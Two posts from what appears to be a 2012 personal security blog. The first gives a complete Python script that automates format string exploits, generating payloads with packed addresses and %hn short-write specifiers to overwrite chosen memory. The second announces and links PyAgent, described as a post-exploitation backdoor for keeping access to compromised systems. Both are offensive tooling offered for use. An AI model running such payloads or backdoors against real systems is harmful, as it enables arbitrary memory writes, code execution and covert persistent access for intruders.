Friday, July 13, 2012

Those annoying format string exploits

Format string exploits are a pain to write manually.  And it's really easy to make an error, adjust a bunch of stuff, then realize that you had the wrong offset and everything needs to be re-calculated.  I got fed up tonight and (based off of the short (2 byte) write examples in this [Table 12-2]) wrote a little program to automate it for me.  I know there are many examples of this out there (@tlas toolbelt...etc), but I felt like I needed to go through the process to cement my understanding of it.  And I like python more than perl. SO:


#! /usr/bin/env python
from sys import argv
import struct


if len(argv) < 4:
 print 'usage:\n\t'+argv[0]+'  <addr_to_write_to>  <addr_to_write> <offset>'
 exit(0)

addr_to_write_to = int(argv[1], 16)
addr_to_wite     = int(argv[2], 16)
offset           = int(argv[3])

HOB = int((addr_to_wite & 0xffff0000) >> 16)
LOB = int((addr_to_wite & 0x0000ffff))

s = ''
if (HOB < LOB):
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(HOB-8)+'x'
 s += '%'+str(offset)+'$hn'
 s += '%.'+str(LOB-HOB)+'x'
 s += '%'+str(offset+1)+'$hn'
elif (HOB > LOB):
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(LOB-8)+'x'
 s += '%'+str(offset+1)+'$hn'
 s += '%.'+str(HOB-LOB)+'x'
 s += '%'+str(offset)+'$hn'
else: #HOB == LOB
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(HOB-8)+'x'
 s += '%'+str(offset)+'$hn'
 s += '%.'+str(0x10000)+'x'
 s += '%'+str(offset+1)+'$hn'

print s
Posted by at No comments:

Tuesday, July 3, 2012

PyAgent 1.0

Hurray!  After months of being ignored, I've finally gotten around to cleaning up and refactoring PyAgent.  For those of you who do not know what this is, this is a post exploitation agent to be used once a system has been compromised to maintain access to  allow for a  more interactive and developer friendly backdoor (as opposed to meterpreter, whilst much more sexy, is written in assembly with ruby strains).

And yes, PyAgent is essentially a ripoff of meterpreter by rapid 7 and or hydrogen by canvas.  But it's in python, open sourced (on BitBucket and Serenity-Blue), and modifiable in a clean format (adding functionality is SUPER easy).  So, here you go:

http://serenity-blue.com/PyAgent/index.html
Posted by at No comments:
Subscribe to: Posts (Atom)